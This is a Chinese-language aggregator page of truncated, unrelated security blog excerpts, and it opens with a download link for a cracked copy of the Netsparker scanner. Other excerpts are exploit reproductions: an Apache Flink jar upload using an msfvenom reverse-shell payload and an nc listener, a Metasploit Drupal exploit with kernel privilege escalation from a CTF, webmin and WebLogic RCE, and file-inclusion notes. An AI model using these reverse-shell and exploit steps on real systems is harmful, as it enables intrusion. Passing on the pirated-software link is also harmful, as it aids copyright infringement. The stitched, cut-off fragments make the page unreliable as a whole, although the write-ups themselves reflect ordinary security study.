漏洞

Web漏扫工具Netsparker Enterprise V5.3破解版下载

孤者浪人 提交于 2019-11-28 08:48:57
0x01 介绍 Netsparker是一个便于使用的Web应用漏洞扫描工具,可以爬行、攻击并识别各种Web应用中存在的漏洞。能识别的Web应用漏洞包括SQL注入、XSS(跨网站指令码)、命令注入、本地文件包含和任意文件读取、远程文件包含、框架注入、内部路径信息披露等。 不同于其它漏洞扫描工具,Netsparker具有相当低的误报率,因为Netsparker执行多次测试以确认任何被识别的漏洞。它还有一个JavaScript引擎,可以解析、执行并分析Web应用中使用的JavaScript和VBScript输出。因此,Netsparker能成功爬行并充分了解网站(使用不同的AJAX框架、自定义代码或知名的框架如jQuery)。 0x02 下载 下载: 链接: https://pan.baidu.com/s/1vkFGeQ-Bcf-_PsT5008nFw 提取码: i5hc 安装: 安装Netsparker必须安装.net 4.7.2及以上框架 Netsparker支持的安全测试包括 SQL注入 XSS(跨站点脚本) DOM XSS 命令注入 盲命令注入 本地文件包含和任意文件读取 远程文件包含 远程代码注入/评估 CRLF / HTTP标头注入/响应拆分 打开重定向 帧注入 具有管理员权限的数据库用户 漏洞 - 数据库(推断的漏洞) ViewState未签名 ViewState未加密

漏洞复现——apache文件解析漏洞

别说谁变了你拦得住时间么 提交于 2019-11-28 08:40:54
漏洞描述: 我们可以上传一个文件名末尾包含换行符的文件,以此绕过它的黑名单 影响版本: apache 2.4.0-2.4.29 漏洞分析: <FilesMath "\.(?i:php|php3|php4)$> Order allow,deny Deny from all </Files:Math> 观察上面代码,这段代码的作用是限制上传文件的类型,不能上传php等这样后缀名的文件,既然是黑名单,那么我可以想办法去绕过这个,可以看到后面有个“$”这个符号,他的意思是可以匹配行尾或者一个换行符,所以我们可以在后面加上换行符“\x0A”,这样就可以绕过这个黑名单了,上传我们的文件。 修复方案: 升级apache 来源: https://www.cnblogs.com/xiaoqiyue/p/9978509.html

【漏洞复现】Apache Flink任意Jar包上传导致远程代码执行

落花浮王杯 提交于 2019-11-28 08:39:09
前言 记一次Apache Flink任意Jar包上传导致远程代码执行复现漏洞过程。 作者一直致力于小白都能看懂的漏洞复现过程,感谢大家们一路以来的支持! 致谢Cx01、丞相等表哥们。没有你们的帮助,没有这篇文章! 0x01 漏洞描述 近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞. 影响范围:<= 1.9.1(最新版本) 可能是我测的比较少,成功的概率1.9版本比较高。 0x02 漏洞威胁等级 高危 可导致远程代码执行 0x03 漏洞复现 第一步生成payload msfvenom -p java/shell_reverse_tcp LHOST=x.x.x.x LPORT=x -f jar >fuck.jar 名字可以任意取 第二步生成监听端口,这里我选择nc监听端口。 nc -lvp 8000 第三步上传payload 最后直接返回shell 接着执行命令 0x04 复现那些坑 一定要生成公网ip的payload!!! 一定要生成公网ip的payload!!! 一定要生成公网ip的payload!!! 没有钱的小哥哥,小姐姐们可以选择一个Sunny-ngrok 工具进行端口转发。 官方Sunny-ngrok教程 客户端工具下载地址 0x05 批量检测脚本 GitHub地址 脚本源码 """ auth: @l3_W0ng version

webmin RCE漏洞利用及分析

你说的曾经没有我的故事 提交于 2019-11-28 08:24:20
  Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。 利用条件:webmin <= 1.910 原因:官网 SourceForge代码中存在漏洞,github代码中无漏洞,为后门植入,不得不佩服这些老外真会玩,看了一堆大神分析,自己简单记录下。 前面参数传递暂时不提,看下面这段代码,在perl代码中 qx/ ``  等价于``,小伙伴们明白了吧,提交参数old,命令执行,但是你这样看不到回显,所有前面又加了&pass_error报错命令回显,emmm就造成了RCE。  后门藏的太浅了 漏洞利用exp代码(刚码好,Please give me a star,old iron) https://github.com/AdministratorGithub/CVE-2019-15107 来源: https://www.cnblogs.com/junsec/p/11402150.html

思路总结

蹲街弑〆低调 提交于 2019-11-28 08:05:35
前言 最近一个月基本都在做渗透测试,其中很多还是那种没什么功能的很老的几乎相当于静态的站点。我黑盒实战经验不算特别多,去年开始做黑盒测试也主要是做一些功能性很多的站点的渗透测试。关注点几乎在业务逻辑漏洞上面,而且也没什么waf和防火墙。这个月做的更多的是防火墙和waf又多又没什么功能的站点,整个人被折磨的很惨,神志不清,想了想决定总结一下凄惨的这个月。 前半个月还不算太惨,因为目标比较多,一次几十个目标。虽然其中有挺多联动waf和防火墙,但总有没有挂waf的站点,还算可以入手。 1、上扫描器 拿到站首先用nessus把所有目标扫了一遍,如果只拿awvs扫的话,http默认是扫80端口,开在其他的端口上的web服务存在诸如s2-045之类的漏洞的话就很容易漏掉。 nessus先过了一遍所有站点之后,把没有waf和防火墙的站点筛选出来。用nmap扫全端口扫描一下所有站点,导出后先整理出存在web服务的ip和端口,因为有些站点的后台可能就开在别的端口,或者一个ip多个端口开了web服务,把这些都整理出来,然后把没有防火墙的web服务放到awvs里面全部扫一遍,到这里比较明显的漏洞几乎就差不多能扫完了。 2、手工测试 前台几乎没什么可测的,一般来说这种站点能有个搜索功能就差不多了,有注册登录功能就简直让人热泪盈眶。先放到dirsearch/御剑再扫扫目录看看有没有什么敏感目录或者后台目录

靶机-droopyCTF Walkthrough

社会主义新天地 提交于 2019-11-28 06:01:11
droopyCTF https://www.vulnhub.com/?q=droopy&sort=date-des&type=vm CTF镜像合集: https://www.vulnhub.com/?page=18 参考: https://www.hackingarticles.in/hack-droopy-vm-ctf-challenge/ 1.获取目标ip地址,并进行端口发现,目标只开启了80端口 netdiscover -i eth0 -r 192.168.88.1/24 访问web页面 Drupal 7 应该是一个类似于wordpress的一个开源的框架 searchsploit Drupal 7 搜索相关漏洞 使用 msf 利用 漏洞 use exploit/multi/http/drupal_drupageddon set rhosts 192.168.88.200 exploit 利用注入漏洞上传payload 获得shell 搜索内核相关漏洞信息 使用 pty 获取完整性shell python -c 'import pty; pty.spawn("/bin/bash")' 开启web,使用 wget 将 漏洞利用代码下载到目标机器 编译.c文件,执行漏洞利用程序,成功获得root权限。 来源: https://www.cnblogs.com/micr067/p

PHP代码审计---基础学习(二)

笑着哭i 提交于 2019-11-28 05:32:12
0x07 PHP代码审计CSRF跨站请求伪造 CSRF结合XSS杀伤力可以很大 审计CSRF:敏感表单是否使用token验证 利用:用BURP生成csrf的POc xsrf:就是把poc插到xss里面,当点击就会触发 防御策略: 1.验证HTTP Referer字段(但可以绕过) 2.在请求地址中添加token并验证。 3.在htttp头中自定义属性并验证。 0x08 代码审计动态函数执行与匿名函数执行 一、动态与函数执行: 函数与 函数之间的调用,可能会造成的漏洞。 不过这个漏洞利用起来很麻烦,需要结合其他漏洞,而且还要闭合 二、匿名函数执行: 匿名函数(anonymous functions),也叫闭包函数(closures),允许临时创建一个没有指定名称的函数。最经常用作回调函数(callback参数的值)。 create_function :创建匿名函数 0x09 代码审计之unserialize反序列化漏洞 需要满足的条件: 1.unserialize函数的参数可控 2.脚本中存在一个构造函数、析构函数、__wakeup( )函数中,有类(一般存在类中) 3.对象中成员变量的值 反序列化的变量会覆盖类中变量的值 二次漏洞利用,unserialize需要结合其他漏洞进行利用,列子结合用eval任意代码执行 这是序列化过的内容(O:4:"demo":1:{s:4:"test"

Weblogic(CVE-2017-10271)漏洞复现

回眸只為那壹抹淺笑 提交于 2019-11-28 04:51:23
WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271) 漏洞编号 :CVE-2017-10271 漏洞描述 :WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击,近期发现此漏洞的利用方式为传播挖矿程序。 受影响WebLogic版本 :10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0。 A、环境搭建    不解释 B、漏洞利用: 1、初步判断:访问 http://192.168.8.148:7001/wls-wsat/CoordinatorPortType11,存在下图则说明可能存在漏洞 2、构造POST包进行测试,写入test.txt POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: 192.168.8.148:7001 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Upgrade-Insecure-Requests:

文件包含漏洞(File Inclusion)

生来就可爱ヽ(ⅴ<●) 提交于 2019-11-28 04:03:09
0x01 简介 执行PHP文件时,可以通过文件包含函数加载另一个文件,当服务器开启allow_url_include选项时,就可以通过php的某些特性函数,利用url去动态包含文件并解析执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接)。但是,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。文件包含漏洞分为本地文件包含漏洞与远程文件包含漏洞,远程文件包含漏洞是因为开启了php配置中的allow_url_fopen选项(选项开启之后,服务器允许包含一个远程的文件)。 0x02 文件包含相关函数 include(), require() include_once() require_once() include和require区别主要是,include在包含的过程中如果出现错误,会抛出一个警告,程序继续正常运行;而require函数出现错误的时候,会直接报错并退出程序的执行。 而include_once(),require_once()这两个函数,与前两个的不同之处在于这两个函数只包含一次,适用于在脚本执行期间同一个文件有可能被包括超过一次的情况下,你想确保它只被包括一次以避免函数重定义

Struts2-057远程代码执行漏洞(s2-057/CVE-2018-11776)复现

橙三吉。 提交于 2019-11-28 01:45:56
参考了大佬的链接: https://github.com/jas502n/St2-057 00x01前言 Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web 应用的开源MVC框架,主要提供两个版本框架产品: Struts 1和Struts 2。 Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。 00x02漏洞描述 定义XML配置时如果没有设置namespace的值,并且上层动作配置中并没有设置或使用通配符namespace时,可能会导致远程代码执行漏洞的发生。同样也可能因为url标签没有设置value和action的值,并且上层动作并没有设置或使用通配符namespace,从而导致远程代码执行漏洞的发生。 00x03影响版本 Struts 2.3 - Struts 2.3.34 Struts 2.5 - Struts 2.5.16 00x04漏洞验证 在线验证: http://0day.websaas.com.cn/ 本地验证: https: